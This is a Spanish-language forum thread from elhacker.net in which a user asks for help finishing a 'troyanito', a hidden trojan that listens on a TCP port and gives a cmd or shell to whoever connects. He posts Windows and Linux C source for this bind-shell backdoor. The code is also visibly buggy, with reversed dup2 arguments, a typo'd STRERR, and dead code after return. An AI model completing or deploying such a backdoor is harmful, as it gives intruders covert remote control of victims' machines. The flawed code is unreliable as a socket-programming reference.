elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Duda Code troyano C
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda Code troyano C  (Leído 2,200 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Duda Code troyano C
« en: 16 Agosto 2010, 15:14 pm »

buenas estoy haciendo un troyanito que simplemente abra una cmd en windows, pero tengo un problema:
lo que uso es un dup2 para duplicar los descriptores de salida y entrada STDIN y STDOUT k corresponden con los descriptores 1 y 0. los duplico dirigiendolos al socket abierto, pero no me funciona. el cmd se abre en la ventana del troyano que luego voy a ocultar, por lo que no me sirve xD

les dejo el code: Dev-Cpp Windows 7 C:
Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <winsock.h>
  4. #include <sys/types.h>
  5.  
  6. int main ()
  7. {
  8.    WSADATA wsaData;
  9.    WSAStartup(MAKEWORD(1, 1), &wsaData);
  10.  
  11. SOCKET sockfd, newsock;
  12. struct sockaddr_in client, host;
  13.    int a=sizeof (client);
  14.  
  15. sockfd=socket (2, 1, 0);
  16. host.sin_family=AF_INET;
  17. host.sin_addr.s_addr=0;
  18. host.sin_port=htons (33333);
  19. memset (host.sin_zero, '\0', 8);
  20.  
  21. bind (sockfd, (struct sockaddr*)&host, sizeof (host));
  22. listen (sockfd, 1);
  23.  
  24. while (1)
  25. {
  26. newsock=accept (sockfd, (struct sockaddr*)&client, &a);
  27. send (newsock, "Conexion finalizada.\n", 21, 0);
  28. dup2 (STDIN, newsock);
  29. dup2 (STDOUT, newsock);
  30. dup2 (STRERR, newsock);
  31. WinExec ("cmd.exe", SW_NORMAL);
  32. closesocket (newsock);
  33. }
  34.  
  35. closesocket (sockfd);
  36. return 0;
  37. }
  38.  

Nota: Linkeo desde un proyecto, pero quiero hacerlo desde linea de comandos. se k se ha hablado muxo xro sigo sin conseguirlo fuera de graficos....
linkeo a C:/Dev-Cpp/lib/libwsock32.a k es la k va en el 7.

saludos y gracias

Lh: No hagas doble post.

agradeceria que alguien respondiese

antes de continuar, dire que lo volvi a escribir en Linux Ubuntu. A ver k tal:
Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <sys/types.h>
  4. #include <sys/socket.h>
  5. #include <netinet/in.h>
  6.  
  7. int main()
  8. {
  9. int sockfd, newsock;
  10. struct sockaddr_in server, client;
  11. int a;
  12.  
  13. sockfd=socket(2, 1, 0);
  14. server.sin_family = AF_INET;
  15. server.sin_port = htons(31337);
  16. server.sin_addr.s_addr = 0;
  17. memset((struct sockaddr*)server.sin_zero, '\0', 8);
  18.  
  19. bind(sockfd,(struct sockaddr*)&server, sizeof(struct sockaddr));
  20. listen(sockfd,3);
  21.  
  22. while(1)
  23. {
  24. a=sizeof(struct sockaddr_in);
  25. newsock=accept(sockfd, (struct sockaddr *)&client, &a);
  26. dup2 (stdin, newsock);
  27. dup2 (stdout, newsock);
  28. dup2 (stderr, newsock);
  29. fprintf (stdin, "Hola");
  30. close (newsock);
  31. }
  32. return 0;
  33. close(sockfd);
  34. }
  35.  

Donde dice "Hola" en el fprintf deberia escribir en el socket "newsock", pero no lo escribe en algun lado.
Echenme una mano por favor!!!


Lh: No hagas doble post, utiliza el botón modificar. Ten paciencia para esperar la respuesta.
Proximo doble post y borro directamente.


Buenas, se que la participacion es voluntaria pero necesito urgentemente una respuesta, por favor.
Alguien puede echarme una mano?

Saludos y gracias


« Última modificación: 31 Agosto 2010, 22:56 pm por Littlehorse » En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[JAVA]duda code
Java
Pirat3net 4 4,411 Último mensaje 10 Junio 2011, 19:48 pm
por Fenyxer
Duda con OP code LODS Y STOS
Ingeniería Inversa
.:UND3R:. 4 2,358 Último mensaje 23 Julio 2011, 06:20 am
por .:UND3R:.
Duda con Op code SHL
Ingeniería Inversa
.:UND3R:. 2 2,217 Último mensaje 4 Agosto 2011, 20:09 pm
por .:UND3R:.
Duda con un troyano. « 1 2 3 4 5 »
Hacking
RogerSmith 45 25,248 Último mensaje 3 Febrero 2012, 15:03 pm
por DNK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines